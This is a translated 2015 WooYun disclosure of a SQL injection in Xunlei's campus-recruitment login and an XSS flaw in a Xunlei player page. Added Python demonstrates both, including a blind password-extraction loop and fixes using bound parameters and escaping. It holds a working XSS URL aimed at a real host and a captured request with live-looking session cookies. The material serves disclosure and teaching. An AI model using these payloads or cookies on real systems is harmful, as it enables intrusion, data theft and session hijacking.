
Vulnerability summary

Defect ID: wooyun-2015-089804

Title: An injection flaw in Xunlei

Vendor: Xunlei

Author: Croxy

Submitted: 2015-01-03 14:02

Fix date: 2015-02-17 14:04

Published: 2015-02-17 14:04

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-01-03: Details sent to the vendor, awaiting the vendor's handling
2015-01-04: Vendor confirmed; details visible to the vendor only
2015-01-14: Details opened to core white hats and domain experts
2015-01-24: Details opened to regular white hats
2015-02-03: Details opened to intern white hats
2015-02-17: Details opened to the public

Brief description:

I hear Xunlei is a good company.

Detailed description:

The login of the Xunlei campus recruitment site, http://campus.xunlei.com/, has an injection flaw. The captured login request:

GET /login?account=aaa%40test.com&pwd=admin&from=mo&callback=jQuery183006059867197172708_1420216468993&_=1420216825050 HTTP/1.1
Host: svr.campus.xunlei.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: */*
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://campus.xunlei.com/mobile/t/login.html
Cookie: pgv_pvi=8017659823; niuxbbs_8763_saltkey=qmc2M2bV; niuxbbs_8763_lastvisit=1420161936; niuxbbs_8763_sid=iEEb9r; niuxbbs_8763_lastact=1420165616%09home.php%09space; _ga=GA1.2.977311208.1420171555; check_e=AQAB; check_n=ojx%2Fc8S645rVboX1LNLZyFrRze18YlpFCzh4rxTwS2N7yTALd6%2BSIewRa4p26y2TA4OXvOZf29E9k1onzu95E8qWXxfQs0lI5e6Y%2BAs7qw0%2F52Iw%2B8YabQhYxyFALLRdwZZ9R%2F%2FL9W8XXejTPKRhmxZz9JRrwlCFfioGfDjkyzjS%2FFu531puZHdFi7G1gSKxbp7V0L7YL%2B0iSQOrPyeC5c7eivOsLzq%2Fkv9yKtF7PtNK0QWAKfum8HtqhBuI4y7CwuqRebhzl6Z5cZWJg8hsqgEeMHvvIaxUROzROSGMiJzvCt7Ms7DxY4rOPdyCFb1hBvl5L7CCafguOvJ0fovI5w%3D%3D; _x_t_=0; userid=347711301; sessionid=A51904D69B0738C9006FF784C8418EFBB86360247C6D1E251B780CF57EDD272FF8286E401DBB995117EB10B16C724DED58D6F968FF3E2E0191F20B9B9796802D; nickname=Gankme; __utma=166345655.977311208.1420171555.1420210757.1420210757.1; __utmc=166345655; __utmz=166345655.1420210757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); usrname=; active=1; downbyte=0; downfile=0; isspwd=0; isvip=0; jumpkey=D252A52542409BDC1DFEC96D44B57E75DFB344C58A67B67A32A1C64FA39611B287EDEA1BE8274128B88E6EC717DE6079B5E33D9119D255F4ED07D9CCD9F799B50A9EA7BA1C76E294827CF5210BA8053FB352FB8181AE23FFFE87FC35AF6C3094; logintype=1; onlinetime=0; order=165908730; safe=0; score=200; sex=u; upgrade=0; usernewno=xxxxx; usernick=xxx; usertype=0
Connection: keep-alive
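To make the bug class in the login request above concrete, here is an added example (not Xunlei's code, and not part of the original report): a hypothetical login handler that concatenates the account and pwd parameters into its SQL, beside the same query with bound parameters, plus a boolean-based blind extraction loop that shows how a login oracle turns into a data dump. The users table, its columns and the sample accounts are constructed for this example.

```python
import sqlite3
import string

# Constructed sample data standing in for whatever backs svr.campus.xunlei.com/login.
# Table name, column names and accounts are assumptions made for this example.
SAMPLE_USERS = [
    ("aaa@test.com", "correct-horse"),
    ("hr@example.test", "resume-archive"),
]


def make_db():
    """In-memory SQLite database holding the hypothetical users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (account TEXT PRIMARY KEY, pwd TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, account, pwd):
    """Builds the statement by string formatting: the bug class reported above.
    A single quote in either parameter rewrites the WHERE clause."""
    sql = "SELECT account FROM users WHERE account = '%s' AND pwd = '%s'" % (account, pwd)
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, account, pwd):
    """Same query with bound parameters. The driver sends the values apart from
    the statement text, so a quote in the input never closes the literal and
    no JavaScript-side filtering is needed to keep the query intact."""
    row = conn.execute(
        "SELECT account FROM users WHERE account = ? AND pwd = ?", (account, pwd)
    ).fetchone()
    return row[0] if row else None


def blind_extract_pwd(conn, account, max_len=64):
    """Uses login_vulnerable as a yes/no oracle to read another account's pwd
    one character at a time (boolean-based blind injection). The same probes
    sent through login_safe never match anything."""
    charset = string.ascii_lowercase + string.digits + "-"
    found = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            # The trailing "-- " comments out the rest of the original WHERE clause.
            probe = "%s' AND substr(pwd,%d,1)='%s' -- " % (account, pos, ch)
            if login_vulnerable(conn, probe, "irrelevant") is not None:
                found += ch
                break
        else:
            break  # no character matched: end of the stored value
    return found


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "aaa@test.com' -- ", "wrong"))  # aaa@test.com (bypass)
    print(login_safe(db, "aaa@test.com' -- ", "wrong"))        # None
    print(blind_extract_pwd(db, "hr@example.test"))            # resume-archive
```

The blind loop is deliberately slow and simple (one query per candidate character) so the mechanism stays visible; the point is that once the account field is injectable, the contents of every other column and table behind the login are reachable without ever knowing a valid password.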


Proof of vulnerability:

[screenshot: xunlei1.png]

[screenshot: 1.png]

[screenshot: xunlei2.png]

Think of how many résumés are in there... you get the idea >..<
Two for the price of one:
XSS

http://player.client.daquan.xunlei.com/player.php?source_id=16245%273&type=movie&source_type=&title=%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3E&play_link=&flash_play_link=&ts=1355167569
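The title parameter in that URL carries `</title><script>alert(1)</script>`: the payload works because `<title>` is an RCDATA element, so the only thing that can end it is a literal `</title`, and a template that echoes the parameter unescaped hands that to the attacker. The following is an added example (not player.php's real markup, which is not on the page): it pulls the title out of the reported URL, renders it through a hypothetical page template with and without escaping, and checks structurally whether the user data closed the title element early.

```python
import html
from urllib.parse import parse_qs, urlsplit

# The reported URL, used only to recover the title parameter from its query string.
REPORTED_URL = (
    "http://player.client.daquan.xunlei.com/player.php?source_id=16245%273&type=movie"
    "&source_type=&title=%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3E"
    "&play_link=&flash_play_link=&ts=1355167569"
)

# Hypothetical template standing in for the player page; not Xunlei's markup.
TEMPLATE = "<html><head><title>%s</title></head><body><div id=\"player\"></div></body></html>"


def title_param(url):
    """Percent-decodes the query string and returns the title value as the
    server would see it (parse_qs does the decoding)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("title", [""])[0]


def render_vulnerable(title):
    """Echoes the parameter straight into the page: the reported behaviour."""
    return TEMPLATE % title


def render_escaped(title):
    """html.escape rewrites < > & " ' as entities. Inside <title> the browser
    does not interpret tags at all, so neutralising "<" (and with it any
    "</title") is exactly what keeps the attacker inside the element."""
    return TEMPLATE % html.escape(title)


def breaks_out_of_title(doc):
    """The template emits exactly one "</title"; any second occurrence means
    user-controlled data terminated the element and the rest of the payload
    is parsed as markup."""
    return doc.lower().count("</title") != 1


def contains_script_element(doc):
    """True if a <script start tag survives into the rendered document."""
    return "<script" in doc.lower()


if __name__ == "__main__":
    payload = title_param(REPORTED_URL)
    print(repr(payload))
    print("vulnerable:", breaks_out_of_title(render_vulnerable(payload)))  # True
    print("escaped:   ", breaks_out_of_title(render_escaped(payload)))     # False
```

Escaping has to match the output context: `html.escape` is right for text nodes and for `<title>`, but a value that lands inside an unquoted attribute, a `javascript:` URL or an inline script block needs a different encoder, which is why "filter the input" on its own tends to leave holes.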


Exposed .svn directory:

widget.xunlei.com/js/.svn/entries

Fix recommendation:

The data dumped during testing has been deleted; nothing was kept!
Filter the input >..< and don't put too much trust in JavaScript-side checks.

Copyright notice: when reposting, please credit Croxy@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-01-04 09:52

Vendor reply:

Thanks for the report!

Latest status:

None yet